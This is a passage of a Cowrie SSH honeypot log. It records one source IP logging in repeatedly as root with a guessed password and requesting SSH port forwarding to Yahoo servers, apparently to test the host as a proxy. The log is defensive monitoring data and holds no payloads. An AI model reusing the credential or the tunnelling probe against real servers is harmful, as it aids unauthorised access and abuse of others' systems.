{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20794,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20794","sensor":"my-vps","timestamp":"2025-08-26T00:56:43.265530Z","session":"2063644ec707"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:43.313316Z","src_ip":"213.209.150.239","session":"2063644ec707"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:43.361168Z","src_ip":"213.209.150.239","session":"2063644ec707"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57275,"dst_ip":"1.2.3.4","dst_port":22,"session":"82a0089c37c4","protocol":"ssh","message":"New connection: 213.209.150.239:57275 (1.2.3.4:22) [session: 82a0089c37c4]","sensor":"my-vps","timestamp":"2025-08-26T00:56:43.416894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:43.417762Z","src_ip":"213.209.150.239","session":"82a0089c37c4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:43.474428Z","src_ip":"213.209.150.239","session":"82a0089c37c4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:43.756703Z","src_ip":"213.209.150.239","session":"82a0089c37c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":11638,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:11638","sensor":"my-vps","timestamp":"2025-08-26T00:56:43.814223Z","session":"82a0089c37c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:43.871690Z","src_ip":"213.209.150.239","session":"82a0089c37c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":7036,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:7036","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.027054Z","session":"82a0089c37c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.083694Z","src_ip":"213.209.150.239","session":"82a0089c37c4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.141263Z","src_ip":"213.209.150.239","session":"82a0089c37c4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57332,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba54c8849b1a","protocol":"ssh","message":"New connection: 213.209.150.239:57332 (1.2.3.4:22) [session: ba54c8849b1a]","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.186919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.187792Z","src_ip":"213.209.150.239","session":"ba54c8849b1a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.234833Z","src_ip":"213.209.150.239","session":"ba54c8849b1a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.468492Z","src_ip":"213.209.150.239","session":"ba54c8849b1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":22819,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:22819","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.516316Z","session":"ba54c8849b1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.563271Z","src_ip":"213.209.150.239","session":"ba54c8849b1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":5019,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:5019","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.697316Z","session":"ba54c8849b1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.744308Z","src_ip":"213.209.150.239","session":"ba54c8849b1a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.792016Z","src_ip":"213.209.150.239","session":"ba54c8849b1a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57381,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ff29acd0014","protocol":"ssh","message":"New connection: 213.209.150.239:57381 (1.2.3.4:22) [session: 0ff29acd0014]","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.847734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.848386Z","src_ip":"213.209.150.239","session":"0ff29acd0014"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:44.905349Z","src_ip":"213.209.150.239","session":"0ff29acd0014"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:45.187222Z","src_ip":"213.209.150.239","session":"0ff29acd0014"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":1740,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:1740","sensor":"my-vps","timestamp":"2025-08-26T00:56:45.244694Z","session":"0ff29acd0014"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:45.301389Z","src_ip":"213.209.150.239","session":"0ff29acd0014"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":15533,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:15533","sensor":"my-vps","timestamp":"2025-08-26T00:56:45.455362Z","session":"0ff29acd0014"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:45.512000Z","src_ip":"213.209.150.239","session":"0ff29acd0014"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:45.569216Z","src_ip":"213.209.150.239","session":"0ff29acd0014"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57423,"dst_ip":"1.2.3.4","dst_port":22,"session":"9eeec7b70b89","protocol":"ssh","message":"New connection: 213.209.150.239:57423 (1.2.3.4:22) [session: 9eeec7b70b89]","sensor":"my-vps","timestamp":"2025-08-26T00:56:45.624881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:45.626139Z","src_ip":"213.209.150.239","session":"9eeec7b70b89"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:45.682893Z","src_ip":"213.209.150.239","session":"9eeec7b70b89"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:45.964558Z","src_ip":"213.209.150.239","session":"9eeec7b70b89"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":5213,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:5213","sensor":"my-vps","timestamp":"2025-08-26T00:56:46.022014Z","session":"9eeec7b70b89"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:46.078842Z","src_ip":"213.209.150.239","session":"9eeec7b70b89"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":14083,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14083","sensor":"my-vps","timestamp":"2025-08-26T00:56:46.234942Z","session":"9eeec7b70b89"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:46.291622Z","src_ip":"213.209.150.239","session":"9eeec7b70b89"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:46.350140Z","src_ip":"213.209.150.239","session":"9eeec7b70b89"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57476,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bd75961a692","protocol":"ssh","message":"New connection: 213.209.150.239:57476 (1.2.3.4:22) [session: 9bd75961a692]","sensor":"my-vps","timestamp":"2025-08-26T00:56:46.405842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:46.406747Z","src_ip":"213.209.150.239","session":"9bd75961a692"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:46.463233Z","src_ip":"213.209.150.239","session":"9bd75961a692"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:46.745690Z","src_ip":"213.209.150.239","session":"9bd75961a692"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":4297,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:4297","sensor":"my-vps","timestamp":"2025-08-26T00:56:46.803660Z","session":"9bd75961a692"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:46.860471Z","src_ip":"213.209.150.239","session":"9bd75961a692"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":22108,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:22108","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.015160Z","session":"9bd75961a692"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.071961Z","src_ip":"213.209.150.239","session":"9bd75961a692"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.129278Z","src_ip":"213.209.150.239","session":"9bd75961a692"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57534,"dst_ip":"1.2.3.4","dst_port":22,"session":"59f3a1655284","protocol":"ssh","message":"New connection: 213.209.150.239:57534 (1.2.3.4:22) [session: 59f3a1655284]","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.185017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.185914Z","src_ip":"213.209.150.239","session":"59f3a1655284"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.o